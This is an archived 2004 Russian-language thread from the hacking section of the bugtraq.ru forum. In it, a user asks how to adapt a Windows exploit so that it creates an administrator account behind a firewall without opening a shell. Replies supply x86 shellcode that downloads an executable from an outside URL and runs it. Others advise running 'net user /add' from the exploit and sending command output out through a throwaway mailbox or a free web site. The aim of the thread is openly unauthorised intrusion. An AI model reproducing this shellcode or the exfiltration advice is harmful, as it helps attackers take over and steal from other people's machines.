информационная безопасность
без паники и всерьез
 подробно о проектеRambler's Top100
Портрет посетителяСетевые кракеры и правда о деле ЛевинаВсе любят мед
BugTraq.Ru
Русский BugTraq
 Анализ криптографических сетевых... 
 Модель надежности двухузлового... 
 Специальные марковские модели надежности... 
 Три миллиона электронных замков... 
 Doom на газонокосилках 
 Умер Никлаус Вирт 
главная обзор RSN блог библиотека закон бред форум dnet о проекте
bugtraq.ru / форум / hacking
Имя Пароль
ФОРУМ
если вы видите этот текст, отключите в настройках форума использование JavaScript
регистрация





Легенда:
  новое сообщение
  закрытая нитка
  новое сообщение
  в закрытой нитке
  старое сообщение
  • Напоминаю, что масса вопросов по функционированию форума снимается после прочтения его описания.
  • Новичкам также крайне полезно ознакомиться с данным документом.
Короче на машине стоит файрволл (win2k) и надо чтоб сплоит... 04.01.04 21:26  Число просмотров: 1935
Автор: SpAuT Статус: Незарегистрированный пользователь
<"чистая" ссылка>
Короче на машине стоит файрволл (win2k) и надо чтоб сплоит создал пользавотеля с правами админа!Не открывая шелл!
<hacking>
Выполнение команд без открытия шелла 04.01.04 15:21  
Автор: SpAuT Статус: Незарегистрированный пользователь
<"чистая" ссылка>
Дайте инфу или подскажите каким образом надо модифицировать код эксплоита который даёт шелл, таким образом чтоб он выполнил несколько команд баз открытия порта!
Есть проги которые помогают создать шеллкод? 05.01.04 18:12  
Автор: SpAuT Статус: Незарегистрированный пользователь
<"чистая" ссылка>
> Дайте инфу или подскажите каким образом надо модифицировать
> код эксплоита который даёт шелл, таким образом чтоб он
> выполнил несколько команд баз открытия порта!
Есть проги которые помогают создать шеллкод?
Ага 05.01.04 21:12  
Автор: amirul <Serge> Статус: The Elderman
<"чистая" ссылка>
> Есть проги которые помогают создать шеллкод?
Называются компиляторы. Можешь воспользоваться ассемблером, а можешь и чем нибудь вроде C.
Надо написать прогу на си (или можно на си++) , компилить... 05.01.04 17:39  
Автор: SpAuT Статус: Незарегистрированный пользователь
<"чистая" ссылка>
Надо написать прогу на си (или можно на си++) , компилить тока под виндами ( если это переделать
#include <stdio.h>
main()
{
char *shell[2];
shell[0] = "/bin/sh";
shell[1] = NULL;
execve(shell[0], shell, NULL);
}
на это
#include <stdio.h>
main()
{
char *shell[2];
shell[0] = "c:\windows\system32\cmd.exe";
shell[1] = NULL;
execve(shell[0], shell, NULL);
}
Какой самый маленький дизассемблер ( по размеру файла)?
ну ты даешь... 06.01.04 05:09  
Автор: DgtlScrm Статус: Member
Отредактировано 06.01.04 05:12  Количество правок: 1
<"чистая" ссылка>
на переносимость я так полагаю ты не рассчитываешь? Как знаешь... но тогда лудше всеравно пиши на асме:

xor  ebx, ebx; 
add  dh, 0xff;
// app name: http://www.ietest1.by.ru/fooware.exe
mov  dword ptr[edx-0x28],0x70747468;// save "http"
mov  dword ptr[edx-0x24],0x772f2f3a;	// save "://w"
mov  dword ptr[edx-0x20],0x692e7777;// save "ww.i"
mov  dword ptr[edx-0x1c],0x73657465;// save "etes"
mov  dword ptr[edx-0x18],0x622e3174;// save "t1.b"
mov  dword ptr[edx-0x14],0x75722e79;// save "y.ru"
mov  dword ptr[edx-0x10],0x6f6f662f;	// save "/foo"
mov  dword ptr[edx-0x0c],0x65726177;// save "ware"
mov  dword ptr[edx-0x08],0x6578652e;// save ".exe"
mov  dword ptr[edx-0x04],ebx;// fill with \x00 on the end

lea  eax, [edx-0x28];		
add  dh, 0xff
mov  dword ptr[edx-0x0c],0x785c3a63;// save "c:\X" (file to download)
mov  dword ptr[edx-0x08],0x6578652e;// save ".exe"
mov  dword ptr[edx-0x04],ebx;// fill with \x00 on the end

lea  ecx, [edx-0x0c];// move ecx addr of string (file name)
pop  ebx;	//set ebx to URLDownloadToFileA entry point
push edx
xor  edx,edxset edx to zero
push edx
push edx
push ecx
push eax
push edx
call ebx

pop  edx;	// restore str addr

// Execute downloaded file:

pop  eax; // get WinExec address
xor  ebx,ebx
add  dh, 0xff
mov  dword ptr[edx-0x0c],0x785c3a63;// save "c:\X" (file to download)
mov  dword ptr[edx-0x08],0x6578652e;// save ".exe"
mov  dword ptr[edx-0x04],ebx;// fill with \x00 on the end

lea  ecx, [edx-0x0c];// move ecx addr of string (file name)
push 0x01
push ecx
call eax

---

А адреса URLDownloadToFile и WinExec ищи как хочешь, уже не маленький :)
(извеняюсь за такой некрасивый код, просто я его выдрал с одного из своих первых спроитов %) )

А ты хотел в килобайтах? Нормальный сплоит поменьше сотни байт это однозначно :)

Этот пример закачивает и запускает. Кстати нащет дизассемблера - это был прикол такой??? Если нет, то сначала немного почитай... (не прийми это как обиду, это просто совет... я когда-тоже такой был :) а наверное таким и остался :) )
неплохая имхо инфа по написанию шеллкодов 06.01.04 11:05  
Автор: vladik_ Статус: Незарегистрированный пользователь
Отредактировано 06.01.04 11:05  Количество правок: 1
<"чистая" ссылка>


инфа
Дизассемблер-то тебе зачем??? 05.01.04 17:51  
Автор: Ktirf <Æ Rusakov> Статус: Elderman
<"чистая" ссылка>
Может тебе все-таки компилятор C нужен?
Нет, но его тоже надо -)Какой самый малой? 05.01.04 18:08  
Автор: SpAuT Статус: Незарегистрированный пользователь
<"чистая" ссылка>
> Может тебе все-таки компилятор C нужен?
Нет, но его тоже надо -)Какой самый малой?
Не знаю как насчет малой. Но W32Dasm когда надо просто... 05.01.04 23:07  
Автор: Killer{R} <Dmitry> Статус: Elderman
<"чистая" ссылка>
Не знаю как насчет малой. Но W32Dasm когда надо просто глянуть дизасм проги у которой нет никаких вы?бонов против дизасма - имхо самое то. Занимает он у меня 1.4мб
Не знаю не знаю. В bochs-е дизасм весит 97 кило :-) [upd] 05.01.04 23:56  
Автор: amirul <Serge> Статус: The Elderman
Отредактировано 06.01.04 00:00  Количество правок: 1
<"чистая" ссылка>
Это в смысле сырцов 97 кило.

http://sourceforge.net/projects/bochs/

Еще хороший ndisasm (из пакета nasm-а). Сырцы не качал, но бинарник весит 160 кило.

http://sourceforge.net/projects/nasm/
Чё та на neworder.box.sk не нашел код! -( Может кто мне его... 05.01.04 14:35  
Автор: SpAuT Статус: Незарегистрированный пользователь
<"чистая" ссылка>
Чё та на neworder.box.sk не нашел код! -( Может кто мне его сгенерирует??!!!!
Надо найти шелл-код, который выполнит данныу операцию. Поищи... 04.01.04 22:06  
Автор: Ilich Статус: Незарегистрированный пользователь
<"чистая" ссылка>
Надо найти шелл-код, который выполнит данныу операцию. Поищи на neworder.box.sk
Короче на машине стоит файрволл (win2k) и надо чтоб сплоит... 04.01.04 21:26  
Автор: SpAuT Статус: Незарегистрированный пользователь
<"чистая" ссылка>
Короче на машине стоит файрволл (win2k) и надо чтоб сплоит создал пользавотеля с правами админа!Не открывая шелл!
Ты уверен, что это именно то что тебе надо? 05.01.04 09:32  
Автор: DgtlScrm Статус: Member
<"чистая" ссылка>
> Короче на машине стоит файрволл (win2k) и надо чтоб сплоит
> создал пользавотеля с правами админа!Не открывая шелл!

почитай MSDN о том как создать пользователя. Я так понимаю ты работаешь с переносимым шеллкодом??? Вот и найди все необходимые функции, которые тебе понадобятся, вычили шеллкодом их адреса и исполняй. Только если машина удаленная и вдобавок фаервол, то созданный пользователь тебе не пригодится. Лудше организуй систему исполнения комманд, а результаты работы высылай на левое мыло... или если даже SMTP заблокирован, то создай на H1.RU сайтец и через веб сабмить все данные туда.

Но закон не дремлет :) Хотя и ответственность у нас не такая уж и высокая :)
Дополнение 05.01.04 11:21  
Автор: amirul <Serge> Статус: The Elderman
<"чистая" ссылка>
> почитай MSDN о том как создать пользователя. Я так понимаю
> ты работаешь с переносимым шеллкодом??? Вот и найди все
> необходимые функции, которые тебе понадобятся, вычили
> шеллкодом их адреса и исполняй. Только если машина
Можно даже и без этого обойтись. Просто вместо "cmd.exe" в самом конце сплойта запускать "net user /add"

> удаленная и вдобавок фаервол, то созданный пользователь
> тебе не пригодится. Лудше организуй систему исполнения
> комманд, а результаты работы высылай на левое мыло... или
> если даже SMTP заблокирован, то создай на H1.RU сайтец и
> через веб сабмить все данные туда.
>
> Но закон не дремлет :) Хотя и ответственность у нас не
> такая уж и высокая :)
Во всем остальном полностью согласен
... 05.01.04 16:33  
Автор: DgtlScrm Статус: Member
<"чистая" ссылка>
...
> Можно даже и без этого обойтись. Просто вместо "cmd.exe" в
> самом конце сплойта запускать "net user /add"

да, пожалуй такое решение по проще :)
Насколько я понимаю в шелл-коде 04.01.04 19:09  
Автор: amirul <Serge> Статус: The Elderman
Отредактировано 04.01.04 19:09  Количество правок: 1
<"чистая" ссылка>
> Дайте инфу или подскажите каким образом надо модифицировать
> код эксплоита который даёт шелл, таким образом чтоб он
> выполнил несколько команд баз открытия порта!
Обычно делается ShellExecute с "open"-ом для cmd.exe или CreateProcess с путем к файлу cmd.exe.

Причем до этого должны находиться всякие заморочки, которые инициализируют винсок, открывают сокет и перенаправляют ввод/вывод создаваемого процесса в этот сокет. Тебе просто надо поудалять эти вещи и поклонировать части с созданием процесса для других команд.
Можно чуть внятнее - что ты не хочешь открывать? :) 04.01.04 15:46  
Автор: Ktirf <Æ Rusakov> Статус: Elderman
<"чистая" ссылка>
1




Rambler's Top100
Рейтинг@Mail.ru


  Copyright © 2001-2024 Dmitry Leonov   Page build time: 0 s   Design: Vadim Derkach